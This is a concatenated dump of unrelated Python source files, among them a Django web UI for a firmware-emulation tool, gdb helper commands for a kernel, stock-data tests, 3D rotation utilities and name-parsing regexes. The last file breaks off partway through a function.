backbone.n_features = 1024
elif 'resnet34' in backbone_str:
backbone = WideResNet34(n_inputs=n_inputs)
elif 'resnet18' in backbone_str:
backbone = WideResNet18(n_inputs=n_inputs)
else:
raise ValueError('Unknown backbone', backbone_str)
pose_dim = cfg.n_pose_dims
logger.info(f'Backbone: {backbone_str}')
backbone.n_inputs = n_inputs
render_size = (240, 320)
model = PosePredictor(backbone=backbone,
renderer=renderer,
mesh_db=mesh_db,
render_size=render_size,
pose_dim=pose_dim)
return model
def create_model_refiner(cfg, renderer, mesh_db):
return create_model_pose(cfg, renderer, mesh_db)
def create_model_coarse(cfg, renderer, mesh_db):
return create_model_pose(cfg, renderer, mesh_db)
|
iexfinance/tests/stocks/test_field_methods.py | jto-d/iexfinance | 653 | 11179253 | <reponame>jto-d/iexfinance<gh_stars>100-1000
import numpy as np
import pandas as pd
import pytest
from iexfinance.stocks import Stock
from iexfinance.utils.exceptions import IEXQueryError
class TestFieldMethod(object):
def setup_class(self):
self.a = Stock("AAPL")
self.b = Stock(["AAPL", "TSLA"])
self.c = Stock("BADSYMBOL")
self.d = Stock(["AAPL", "BADSYMBOL"])
self.aj = Stock("AAPL", output_format="json")
def test_get_field_single_bad_symbol(self):
with pytest.raises(IEXQueryError):
self.c._get_field("company", "exchange")
def test_get_field_batch_bad_symbol(self):
data = self.d._get_field("company", "exchange")
assert isinstance(data, pd.DataFrame)
assert "AAPL" in data.index
assert "BADSYMBOL" not in data.index
def test_get_bad_field(self):
with pytest.raises(KeyError):
self.a._get_field("company", "BADFIELD")
with pytest.raises(KeyError):
self.b._get_field("company", "BADFIELD")
with pytest.raises(KeyError):
self.aj._get_field("company", "BADFIELD")
def test_get_bad_endpoint(self):
with pytest.raises(NotImplementedError):
self.a._get_field("BADFIELD", "NULL")
with pytest.raises(NotImplementedError):
self.b._get_field("BADFIELD", "NULL")
with pytest.raises(NotImplementedError):
self.aj._get_field("BADFIELD", "NULL")
class TestFieldMethods(object):
def setup_class(self):
self.a = Stock("AAPL")
self.b = Stock(["AAPL", "TSLA"])
def test_company_name(self):
data = self.a.get_company_name()
assert isinstance(data, str)
assert data == "Apple Inc"
def test_primary_exchange(self):
data = self.a.get_primary_exchange()
assert isinstance(data, str)
assert len(data) == 33
def test_sector(self):
data = self.a.get_sector()
assert isinstance(data, str)
assert len(data) == 13
def test_open(self):
data = self.a.get_open()
assert isinstance(data, np.float64)
def test_close(self):
data = self.a.get_close()
assert isinstance(data, np.float64)
def test_years_high(self):
data = self.a.get_years_high()
assert isinstance(data, np.float64)
def test_years_low(self):
data = self.a.get_years_low()
assert isinstance(data, np.float64)
def test_ytd_change(self):
data = self.a.get_ytd_change()
assert isinstance(data, np.float64)
def test_volume(self):
data = self.a.get_volume()
assert isinstance(data, np.int64)
def test_market_cap(self):
data = self.a.get_market_cap()
assert isinstance(data, np.int64)
def test_beta(self):
data = self.a.get_beta()
assert isinstance(data, np.float64)
def test_shares_outstanding(self):
data = self.a.get_shares_outstanding()
assert isinstance(data, np.int64)
def test_float(self):
data = self.a.get_float()
assert isinstance(data, np.int64)
|
secure/__init__.py | sesh/secure | 247 | 11179303 | from secure.headers import CacheControl as CacheControl
from secure.headers import ContentSecurityPolicy as ContentSecurityPolicy
from secure.headers import PermissionsPolicy as PermissionsPolicy
from secure.headers import ReferrerPolicy as ReferrerPolicy
from secure.headers import ReportTo as ReportTo
from secure.headers import Server as Server
from secure.headers import StrictTransportSecurity as StrictTransportSecurity
from secure.headers import XContentTypeOptions as XContentTypeOptions
from secure.headers import XFrameOptions as XFrameOptions
from secure.headers import XXSSProtection as XXSSProtection
from secure.secure import Secure as Secure
|
other/gdb_scripts/get_cmds.py | CyberFlameGO/tilck | 1,059 | 11179309 | # SPDX-License-Identifier: BSD-2-Clause
import gdb # pylint: disable=import-error
from . import base_utils as bu
from . import tilck_types as tt
from . import tasks
class cmd_get_task(gdb.Command):
cmd_name = "get-task"
def __init__(self):
super(cmd_get_task, self).__init__(
cmd_get_task.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Usage: get-task <tid>")
def invoke(self, arg, from_tty):
try:
tid = int(arg)
except:
self.show_usage()
return
task = tasks.get_task(tid)
if not task:
print("No such task")
return
gdb.execute("print *(struct task *){}".format(int(task)))
class cmd_get_proc(gdb.Command):
cmd_name = "get-proc"
def __init__(self):
super(cmd_get_proc, self).__init__(
cmd_get_proc.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Use: get-proc <pid>")
def invoke(self, arg, from_tty):
try:
pid = int(arg)
except:
self.show_usage()
return
proc = tasks.get_proc(pid)
if not proc:
print("No such process")
return
gdb.execute("print *(struct process *){}".format(int(proc)))
class cmd_get_handle2(gdb.Command):
cmd_name = "get-handle2"
def __init__(self):
super(cmd_get_handle2, self).__init__(
cmd_get_handle2.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Use: get-handle2 <pid> <handle_number>")
def invoke(self, arg, from_tty):
try:
pid, hn = arg.split(" ")
pid = int(pid)
hn = int(hn)
except:
self.show_usage()
return
proc = tasks.get_proc(pid)
if not proc:
print("No such process")
return
handle = tasks.get_handle(proc, hn)
if not handle:
print("No such handle")
return
gdb.execute("print *(struct fs_handle_base *){}".format(int(handle)))
class cmd_get_handle(gdb.Command):
cmd_name = "get-handle"
def __init__(self):
super(cmd_get_handle, self).__init__(
cmd_get_handle.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Use: get-handle <handle_number> # assuming the current process")
def invoke(self, arg, from_tty):
try:
hn = int(arg)
except:
self.show_usage()
return
curr = gdb.parse_and_eval("__current->pi")
handle = tasks.get_handle(curr, hn)
if not handle:
print("No such handle")
return
gdb.execute("print *(struct fs_handle_base *){}".format(int(handle)))
class cmd_get_curr(gdb.Command):
cmd_name = "get-curr"
def __init__(self):
super(cmd_get_curr, self).__init__(
cmd_get_curr.cmd_name,
gdb.COMMAND_USER
)
def invoke(self, arg, from_tty):
gdb.execute("print *__current")
class cmd_get_currp(gdb.Command):
cmd_name = "get-currp"
def __init__(self):
super(cmd_get_currp, self).__init__(
cmd_get_currp.cmd_name,
gdb.COMMAND_USER
)
def invoke(self, arg, from_tty):
gdb.execute("print *__current->pi")
# ------------------------------------------------------
bu.register_new_custom_gdb_cmd(cmd_get_task)
bu.register_new_custom_gdb_cmd(cmd_get_proc)
bu.register_new_custom_gdb_cmd(cmd_get_handle2)
bu.register_new_custom_gdb_cmd(cmd_get_handle)
bu.register_new_custom_gdb_cmd(cmd_get_curr)
bu.register_new_custom_gdb_cmd(cmd_get_currp)
|
challenges/4.E.Max_Value/main.py | pradeepsaiu/python-coding-challenges | 141 | 11179340 | <reponame>pradeepsaiu/python-coding-challenges
numbers = [8, 2, 4, 3, 6, 5, 9, 1]
### Modify the code below ###
highest = numbers
### Modify the code above ###
print(highest)
|
guild/tests/samples/projects/hparam-summaries/echo.py | wheatdog/guildai | 694 | 11179341 | <filename>guild/tests/samples/projects/hparam-summaries/echo.py
x_flag = None
print("x_metric: %s" % x_flag)
|
util.py | WangYueFt/prnet | 105 | 11179362 | <reponame>WangYueFt/prnet
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
from scipy.spatial.transform import Rotation
def euler2mat(angle):
"""
convert euler angles [B, 3] to rotation matrix, reference: https://github.com/ClementPinard/SfmLearner-Pytorch/blob/master/inverse_warp.py
:param angle: rx, ry, rz [B, 3]
:return: rotation matrix [B, 3, 3]
"""
B = angle.size(0)
x, y, z = angle[:,0], angle[:,1], angle[:,2]
cosz = torch.cos(z)
sinz = torch.sin(z)
zeros = z.detach()*0
ones = zeros.detach()+1
zmat = torch.stack([cosz, -sinz, zeros,
sinz, cosz, zeros,
zeros, zeros, ones], dim=1).reshape(B, 3, 3)
cosy = torch.cos(y)
siny = torch.sin(y)
ymat = torch.stack([cosy, zeros, siny,
zeros, ones, zeros,
-siny, zeros, cosy], dim=1).reshape(B, 3, 3)
cosx = torch.cos(x)
sinx = torch.sin(x)
xmat = torch.stack([ones, zeros, zeros,
zeros, cosx, -sinx,
zeros, sinx, cosx], dim=1).reshape(B, 3, 3)
rotMat = xmat @ ymat @ zmat
return rotMat
def quat2mat(quat):
"""
convert quaternion to rotation matrix ([x, y, z, w] to follow scipy
:param quat: four quaternion of rotation
:return: rotation matrix [B, 3, 3]
"""
# norm_quat = torch.cat([quat[:, :1].detach()*0 + 1, quat], dim=1)
# norm_quat = norm_quat/norm_quat.norm(p=2, dim=1, keepdim=True)
# w, x, y, z = norm_quat[:,0], norm_quat[:,1], norm_quat[:,2], norm_quat[:,3]
x, y, z, w = quat[:, 0], quat[:, 1], quat[:, 2], quat[:, 3]
B = quat.size(0)
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.stack([w2 + x2 - y2 - z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, w2 - x2 + y2 - z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, w2 - x2 - y2 + z2], dim=1).reshape(B, 3, 3)
return rotMat
def pose_vec2mat(vec, rotation_mode='euler'):
"""
:param vec: tx, ty, tz, rx, ry, rz [B, 6]
:param rotation_mode: 'euler' or 'quat'
:return: rotation matrix [B, 3, 3] and translation matrix [B, 3, 1]
"""
translation_mat = vec[:, :3].unsqueeze(-1) # [B, 3, 1]
rot = vec[:, 3:]
if rotation_mode == 'euler':
rot_mat = euler2mat(rot) # [B, 3, 3]
elif rotation_mode == 'quat':
rot_mat = quat2mat(rot) # [B, 3, 3]
return rot_mat, translation_mat
def mat2euler(rot_mat, seq='xyz'):
"""
convert rotation matrix to euler angle
:param rot_mat: rotation matrix rx*ry*rz [B, 3, 3]
:param seq: seq is xyz(rotate along z first) or zyx
:return: three angles, x, y, z
"""
r11 = rot_mat[:, 0, 0]
r12 = rot_mat[:, 0, 1]
r13 = rot_mat[:, 0, 2]
r21 = rot_mat[:, 1, 0]
r22 = rot_mat[:, 1, 1]
r23 = rot_mat[:, 1, 2]
r31 = rot_mat[:, 2, 0]
r32 = rot_mat[:, 2, 1]
r33 = rot_mat[:, 2, 2]
if seq == 'xyz':
z = torch.atan2(-r12, r11)
y = torch.asin(r13)
x = torch.atan2(-r23, r33)
else:
y = torch.asin(-r31)
x = torch.atan2(r32, r33)
z = torch.atan2(r21, r11)
return torch.stack((x, y, z), dim=1)
def mat2quat(rot_mat, seq='xyz'):
"""
covert rotation matrix to quaternion
:param rot_mat: rotation matrix [B, 3, 3]
:param seq: 'xyz'(rotate along z first) or 'zyx'
:return: quaternion of the first three entries
"""
pass
def mat2pose_vec(rot_mat, translation_mat, rotation_mode='euler', seq='xyz'):
"""
Convert rotation matrix and translation matrix to 6DoF
:param rot_mat: [B, 3, 3]
:param translation_mat: [B, 3, 1]
:param rotation_mode: 'euler' or quat'
:param seq: 'xyz'(rotate along z first) or 'zyx'
:return: pose_vec - tx, ty, tz, rx, ry, rz [B, 6]
"""
pass
def transform_point_cloud(point_cloud, rotation, translation):
"""
:param point_cloud: [B, 3, N]
:param rotation: Euler angel [B, 3]
:param translation: Translation [B, 3]
:return:
"""
if len(rotation.size()) == 2:
rot_mat = quat2mat(rotation)
else:
rot_mat = rotation
return torch.matmul(rot_mat, point_cloud) + translation.unsqueeze(2)
def npmat2euler(mats, seq='zyx'):
eulers = []
for i in range(mats.shape[0]):
r = Rotation.from_dcm(mats[i])
eulers.append(r.as_euler(seq, degrees=True))
return np.asarray(eulers, dtype='float32')
if __name__ == '__main__':
print('hello world')
|
modules/nameparser/config/regexes.py | whanderley/eden | 205 | 11179396 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
# emoji regex from https://stackoverflow.com/questions/26568722/remove-unicode-emoji-using-re-in-python
try:
# Wide UCS-4 build
re_emoji = re.compile('['
'\U0001F300-\U0001F64F'
'\U0001F680-\U0001F6FF'
'\u2600-\u26FF\u2700-\u27BF]+',
re.UNICODE)
except re.error:
# Narrow UCS-2 build
re_emoji = re.compile('('
'\ud83c[\udf00-\udfff]|'
'\ud83d[\udc00-\ude4f\ude80-\udeff]|'
'[\u2600-\u26FF\u2700-\u27BF])+',
re.UNICODE)
REGEXES = set([
("spaces", re.compile(r"\s+", re.U)),
("word", re.compile(r"(\w|\.)+", re.U)),
("mac", re.compile(r'^(ma?c)(\w+)', re.I | re.U)),
("initial", re.compile(r'^(\w\.|[A-Z])?$', re.U)),
("nickname", re.compile(r'\s*?[\("](.+?)[\)"]', re.U)),
("roman_numeral", re.compile(r'^(X|IX|IV|V?I{0,3})$', re.I | re.U)),
("no_vowels",re.compile(r'^[^aeyiuo]+$', re.I | re.U)),
("period_not_at_end",re.compile(r'.*\..+$', re.I | re.U)),
("emoji",re_emoji),
])
"""
All regular expressions used by the parser are precompiled and stored in the config.
"""
|
frankensteinWebUI/views.py | ParikhKadam/frankenstein | 344 | 11179433 | <reponame>ParikhKadam/frankenstein
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.utils.http import urlencode
from django import forms
import os
import json
import glob
import hashlib
from binascii import hexlify, unhexlify
import traceback
from core.project import Project #TODO rename
#TODO move to forms.py
class projectNameForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x])
class editConfigForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
toolchain = forms.CharField(max_length=100, help_text='Toolchain', validators=[lambda x: not x])
emulationCFlags = forms.CharField(max_length=1000, help_text='emulationCFlags', validators=[lambda x: not x])
emulationCodeBase = forms.CharField(help_text="emulationCodeBase", validators=[lambda x: not int(x,16)])
patchCFlags = forms.CharField(max_length=1000, help_text='patchCFlags', validators=[lambda x: not x])
patchCodeBase = forms.CharField(help_text="patchCodeBase", validators=[lambda x: not int(x,16)])
class editGroupForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
oldGroupName = forms.CharField(max_length=100, help_text='Old Group Name', validators=[lambda x: not x])
newGroupName = forms.CharField(max_length=100, help_text='New Group Name', validators=[lambda x: not x])
active = forms.BooleanField(help_text="Is Segment Active", required=False)
class editSegmentForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
oldSegmentName = forms.CharField(max_length=100, help_text='Old Segment Name', validators=[lambda x: not x])
oldGroupName = forms.CharField(max_length=100, help_text='Old Group Name', validators=[lambda x: not x])
newSegmentName = forms.CharField(max_length=100, help_text='New Segment Name', validators=[lambda x: not x])
newGroupName = forms.CharField(max_length=100, help_text='New Group Name', validators=[lambda x: not x])
addr = forms.CharField(help_text="Segment Address", validators=[lambda x: not int(x,16)])
active = forms.BooleanField(help_text="Is Segment Active", required=False)
class editSymbolForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
oldSymbolName = forms.CharField(max_length=100, validators=[lambda x: not x], widget=forms.HiddenInput())
oldGroupName = forms.CharField(max_length=100, validators=[lambda x: not x], widget=forms.HiddenInput())
newSymbolName = forms.CharField(max_length=100, help_text='Symbol Name', validators=[lambda x: not x])
newGroupName = forms.CharField(max_length=100, help_text='Group Name', validators=[lambda x: not x])
value = forms.CharField(help_text="Value", validators=[lambda x: not int(x,16)])
class loadSegmentForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
segment = forms.FileField(help_text='File', validators=[lambda x: not x])
addr = forms.CharField(help_text="Segment Address", validators=[lambda x: not int(x,16)])
groupName = forms.CharField(max_length=100, help_text='Segment Group', validators=[lambda x: not x])
class loadELFForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
elf = forms.FileField(help_text='File', validators=[lambda x: not x])
loadSymbols = forms.BooleanField(help_text="Load Symbols", required=False, initial=True)
loadSegments = forms.BooleanField(help_text="Load Segments", required=False, initial=True)
groupName = forms.CharField(max_length=100, help_text='Segment Group', validators=[lambda x: not x])
class loadIdbForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
idb = forms.FileField(help_text='File', validators=[lambda x: not x])
loadFunctions = forms.BooleanField(help_text="Load Functions", required=False, initial=True)
loadSegments = forms.BooleanField(help_text="Load Segments", required=False, initial=True)
def render_wrapper(request, template, context={}):
projects = glob.glob("projects/*/project.json")
projects = map(lambda x: os.path.basename(os.path.dirname(x)), projects)
context["projects"] = {}
for projectName in projects:
emulators = glob.glob(getProjectPath(projectName)+"/gen/*.exe")
context["projects"][projectName] = map(os.path.basename, emulators)
if "title" not in context:
context["title"] = "Frankenstein"
return render(request, template, context)
"""
Project Management
"""
def getProjectPath(projectName):
return "projects/"+os.path.basename(projectName)
def getProjectByName(projectName):
projectPath = "projects/"+os.path.basename(projectName)
return Project(projectPath)
def index(request):
return render_wrapper(request, 'index.html')
def project(request):
projectName = request.GET["projectName"]
if not os.path.isfile("projects/%s/project.json" % projectName):
return redirect("/")
project = getProjectByName(projectName)
patches = glob.glob(getProjectPath(projectName)+"/gen/*.patch")
patches = map(os.path.basename, patches)
context = {
"title": projectName,
"projectName": projectName,
"project": project,
"patches": patches,
}
context['projectNameForm'] = projectNameForm({"projectName": projectName})
context['editSegmentForm'] = editSegmentForm({"projectName": projectName})
context['loadSegmentForm'] = loadSegmentForm({"projectName": projectName})
context['loadELFForm'] = loadELFForm({"projectName": projectName})
context['loadIdbForm'] = loadIdbForm({"projectName": projectName})
return render_wrapper(request, 'project.html', context)
def newProject(request):
if request.method == 'POST':
form = projectNameForm(request.POST)
if form.is_valid():
project = getProjectByName(form.cleaned_data["projectName"])
project.save()
return redirect("/")
else:
form = projectNameForm()
context = {}
context['projectNameForm'] = form
return render_wrapper(request, 'project/newProject.html', context)
def getProjectCfg(request):
projectName = request.GET["projectName"]
if not os.path.isfile("projects/%s/project.json" % projectName):
redirect("/")
project = getProjectByName(projectName)
return HttpResponse(json.dumps(project.cfg))
def projectSanityCheck(request):
projectName = request.GET["projectName"]
if not os.path.isfile("projects/%s/project.json" % projectName):
redirect("/")
try:
project = getProjectByName(projectName)
project.sanity_check()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
"""
Config/Group/Segment/Symbol Management
"""
def editConfig(request):
if request.method == 'POST':
form = editConfigForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
project = getProjectByName(projectName)
succsess = True
if not project.set_toolchain(form.cleaned_data["toolchain"]):
succsess = False
if not project.set_emulation_config(form.cleaned_data["emulationCFlags"], int(form.cleaned_data["emulationCodeBase"], 16)):
succsess = False
if not project.set_patch_config(form.cleaned_data["patchCFlags"], int(form.cleaned_data["patchCodeBase"], 16)):
succsess = False
if succsess:
project.save()
return HttpResponse(project.error_msgs)
else:
form = editConfigForm()
return HttpResponse(str(form.errors))
def editGroup(request):
if request.method == 'POST':
form = editGroupForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
oldGroupName = form.cleaned_data["oldGroupName"]
newGroupName = form.cleaned_data["newGroupName"]
active = form.cleaned_data["active"]
project = getProjectByName(projectName)
if "actionUpdate" in request.POST:
project.group_update(oldGroupName, newGroupName)
project.group_set_active(newGroupName, active)
project.save()
if "actionDelete" in request.POST:
project.group_delete(oldGroupName)
project.save()
return HttpResponse(project.error_msgs)
else:
form = editGroupForm()
return HttpResponse(str(form.errors))
def editSegment(request):
if request.method == 'POST':
form = editSegmentForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
oldSegmentName = form.cleaned_data["oldSegmentName"]
oldGroupName = form.cleaned_data["oldGroupName"]
newSegmentName = form.cleaned_data["newSegmentName"]
newGroupName = form.cleaned_data["newGroupName"]
active = form.cleaned_data["active"]
addr = int(form.cleaned_data["addr"], 16)
project = getProjectByName(projectName)
if "actionUpdate" in request.POST:
project.update_segment(oldGroupName, oldSegmentName, newGroupName, newSegmentName, addr)
project.set_active_segment(newGroupName, newSegmentName, active)
project.save()
if "actionDelete" in request.POST:
project.delete_segment(oldGroupName, oldSegmentName)
project.save()
return HttpResponse(project.error_msgs)
else:
form = editSegmentForm()
return HttpResponse(str(form.errors))
def editSymbol(request):
if request.method == 'POST':
form = editSymbolForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
oldSymbolName = form.cleaned_data["oldSymbolName"]
oldGroupName = form.cleaned_data["oldGroupName"]
newSymbolName = form.cleaned_data["newSymbolName"]
newGroupName = form.cleaned_data["newGroupName"]
value = form.cleaned_data["value"]
project = getProjectByName(projectName)
if "actionAdd" in request.POST:
if project.add_symbol(newGroupName, newSymbolName, int(value, 16)):
project.save()
if "actionUpdate" in request.POST:
if project.update_symbol(oldGroupName, oldSymbolName, newGroupName, newSymbolName, int(value, 16)):
project.save()
if "actionDelete" in request.POST:
if project.delete_symbol(oldGroupName, oldSymbolName):
project.save()
return HttpResponse(project.error_msgs)
else:
form = editSymbolForm()
return HttpResponse(str(form.errors))
"""
Import Data
"""
def loadELF(request):
if request.method == 'POST':
form = loadELFForm(request.POST, request.FILES)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
loadSegments = form.cleaned_data["loadSegments"]
loadSymbols = form.cleaned_data["loadSymbols"]
groupName = form.cleaned_data["groupName"]
groupName = "" if groupName == "Create New" else groupName
try:
fname = os.path.basename(str(request.FILES['elf']))
with open('/tmp/%s' % fname, 'wb+') as f:
for chunk in request.FILES['elf'].chunks():
f.write(chunk)
project = getProjectByName(form.cleaned_data["projectName"])
project.load_elf("/tmp/%s" % fname, load_segments=loadSegments, load_symbols=loadSymbols, group=groupName)
project.save()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
else:
form = loadELFForm()
context = {}
return HttpResponse(str(form.errors))
def loadIdb(request):
if request.method == 'POST':
form = loadIdbForm(request.POST, request.FILES)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
loadSegments = form.cleaned_data["loadSegments"]
loadFunctions = form.cleaned_data["loadFunctions"]
fname = os.path.basename(str(request.FILES['idb']))
with open('/tmp/%s' % fname, 'wb+') as f:
for chunk in request.FILES['idb'].chunks():
f.write(chunk)
try:
project = getProjectByName(form.cleaned_data["projectName"])
pe.project.load_idb("/tmp/%s" % fname, load_segments=loadSegments, load_functions=loadFunctions)
pe.project.save()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
else:
form = loadIdbForm()
return HttpResponse(str(form.errors))
def loadSegment(request):
if request.method == 'POST':
form = loadSegmentForm(request.POST, request.FILES)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
addr = int(form.cleaned_data["addr"], 16)
groupName = form.cleaned_data["groupName"]
data = request.FILES['segment'].read()
fname = os.path.basename(str(request.FILES['segment']))
segmentName = "%s_0x%x" % (fname, addr)
try:
project = getProjectByName(form.cleaned_data["projectName"])
project.add_segment(groupName, segmentName, addr, data)
project.save()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
else:
form = loadELFForm()
return HttpResponse(str(form.errors))
"""
Emulation
"""
from core import uc
import base64
class emulateForm(forms.Form):
tracepoints = forms.CharField(help_text='RWX Tracepoints', required=False)
stdin = forms.CharField(help_text='Stdin Hex Dump', required=False)
def emulate(request):
context = {"success": False}
projectName = request.GET["projectName"]
project = getProjectByName(projectName)
if not project:
return redirect("/")
projectPath = getProjectPath(projectName)
context["title"] = "%s/%s Emulate" % (request.GET["projectName"], request.GET["emulatorName"])
if request.method == 'POST':
form = emulateForm(request.POST)
if form.is_valid():
tracepoints = form.cleaned_data["tracepoints"]
if len(tracepoints) > 2:
for w in " \r\n\t":
tracepoints = tracepoints.replace(w, ",")
tracepoints = filter(lambda x: len(x) > 0, tracepoints.split(","))
tracepoints = list(map(lambda x:int(x,16), tracepoints))
else:
tracepoints = []
try:
stdin = form.cleaned_data["stdin"]
stdin = stdin.replace(" ", "").replace("\n", "").replace("\r", "")
print(stdin)
stdin = unhexlify(stdin)
except:
import traceback; traceback.print_exc()
stdin = ""
binaryPath = os.path.join(projectPath, "gen", request.GET["emulatorName"])
emulator = uc.emu(binaryPath, stdin, tracepoints, emulator_base=project.cfg["config"]["EMULATION_CODE_BASE"])
emulator.run()
#prepare results for html
results = emulator.results
from ansi2html import Ansi2HTMLConverter
conv = Ansi2HTMLConverter()
for r in results:
del r["stdout"]
r["pc_symbolized"] = project.symbolize(r["regs"]["pc"])
r["stderr"] = base64.b64encode(r["stderr"].encode("utf-8")).decode("utf-8")
r["memdif_rendered"] = base64.b64encode(r["memdif_rendered"].encode("utf-8")).decode("utf-8")
r["memdif_html"] = base64.b64encode(conv.convert(r["memdif_rendered"]).encode("utf-8")).decode("utf-8")
emulator.coverage_activity_json = json.dumps(emulator.coverage_activity)
emulator.read_activity_json = json.dumps(emulator.read_activity)
emulator.write_activity_json = json.dumps(emulator.write_activity)
#context["segments"] = sorted(project.cfg["segments"].items(), key=lambda x: x[1]["addr"])
context["symbols_json"] = json.dumps(project.get_symbols())
context["emulator"] = emulator
context["tracefile_b64"] = base64.b64encode(emulator.get_tracefile()).decode()
context["project"] = project
context["success"] = True
else:
form = emulateForm()
context["emulateForm"] = form
context["projectName"] = projectName
context["emulatorName"] = request.GET["emulatorName"]
return render_wrapper(request, 'emulate.html', context)
|
osf/models/schema_response_block.py | gaybro8777/osf.io | 628 | 11179434 | <reponame>gaybro8777/osf.io
from django.db import models
from django.utils.functional import cached_property
from osf.exceptions import SchemaResponseUpdateError
from osf.models.base import BaseModel, ObjectIDMixin
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
from osf.utils import sanitize
SUPPORTED_TYPE_FOR_BLOCK_TYPE = {
'short-text-input': str,
'long-text-input': str,
'single-select-input': str,
'multi-select-input': list,
'contributors-input': str,
'file-input': list,
}
class SchemaResponseBlock(ObjectIDMixin, BaseModel):
# The SchemaResponse instance where this response originated
source_schema_response = models.ForeignKey(
'osf.SchemaResponse',
null=False,
related_name='updated_response_blocks'
)
# The RegistrationSchemaBlock that defines the question being answered
source_schema_block = models.ForeignKey('osf.RegistrationSchemaBlock', null=False)
# Should match source_schema_block.registration_response_key
schema_key = models.CharField(max_length=255)
response = DateTimeAwareJSONField(blank=True, null=True)
class Meta:
unique_together = ('source_schema_response', 'source_schema_block')
@classmethod
def create(cls, source_schema_response, source_schema_block, response_value=None):
new_response_block = cls(
source_schema_response=source_schema_response,
source_schema_block=source_schema_block,
schema_key=source_schema_block.registration_response_key
)
new_response_block.set_response(response_value)
return new_response_block
@cached_property
def block_type(self):
return self.source_schema_block.block_type
@cached_property
def required(self):
return self.source_schema_block.required
def set_response(self, response_value=None):
'''Set the response for the block.
Validates and sanitizes the value before assigning.
Assigns a sane default for the block type if no value or a
False-equivalent value is passed.
'''
if not response_value:
response_value = SUPPORTED_TYPE_FOR_BLOCK_TYPE[self.block_type]()
if not self.is_valid(response_value, check_required=False):
raise SchemaResponseUpdateError(
response=self.source_schema_response,
invalid_responses={self.schema_key: response_value})
self.response = _sanitize_response(response_value, self.block_type)
self.save()
def is_valid(self, response_value=None, check_required=True):
'''Confirms that a response value is valid for this block.'''
if response_value is None:
response_value = self.response
block_type = self.block_type
if not isinstance(response_value, SUPPORTED_TYPE_FOR_BLOCK_TYPE[block_type]):
return False
if not self._has_valid_selections(response_value):
return False
if check_required and self.required and not response_value:
return False
return True
def _has_valid_selections(self, response_value):
'''Validate the contents of a `*-select-input` block.'''
block_type = self.block_type
if block_type not in ['single-select-input', 'multi-select-input']:
return True
# Listify the response value
values = response_value
if block_type == 'single-select-input':
values = [values] if values else []
if not values: # validation of required fields occurs elsewhere
return True
allowed_options = self._get_select_input_options()
return all(entry in allowed_options for entry in values)
def _get_select_input_options(self):
group_key = self.source_schema_block.schema_block_group_key
allowed_values = self.source_schema_block.schema.schema_blocks.filter(
schema_block_group_key=group_key, block_type='select-input-option'
).values_list('display_text', flat=True)
return list(allowed_values)
def _sanitize_response(response_value, block_type):
if block_type == 'file-input':
return response_value # don't mess with this magic
elif block_type == 'multi-select-input':
return [sanitize.strip_html(entry) for entry in response_value]
else:
return sanitize.strip_html(response_value)
|
igibson/object_states/frozen.py | mamadbiabon/iGibson | 360 | 11179480 | <reponame>mamadbiabon/iGibson
import numpy as np
from igibson.object_states.object_state_base import AbsoluteObjectState, BooleanState
from igibson.object_states.temperature import Temperature
from igibson.object_states.texture_change_state_mixin import TextureChangeStateMixin
from igibson.utils.utils import transform_texture
_DEFAULT_FREEZE_TEMPERATURE = 0.0
# When an object is set as frozen, we will sample it between
# the freeze temperature and these offsets.
_FROZEN_SAMPLING_RANGE_MAX = -10.0
_FROZEN_SAMPLING_RANGE_MIN = -50.0
class Frozen(AbsoluteObjectState, BooleanState, TextureChangeStateMixin):
def __init__(self, obj, freeze_temperature=_DEFAULT_FREEZE_TEMPERATURE):
super(Frozen, self).__init__(obj)
self.freeze_temperature = freeze_temperature
@staticmethod
def get_dependencies():
return AbsoluteObjectState.get_dependencies() + [Temperature]
@staticmethod
def create_transformed_texture(diffuse_tex_filename, diffuse_tex_filename_transformed):
# 0.8 mixture with white
transform_texture(diffuse_tex_filename, diffuse_tex_filename_transformed, 0.8, (255, 255, 255))
def _set_value(self, new_value):
if new_value:
temperature = np.random.uniform(
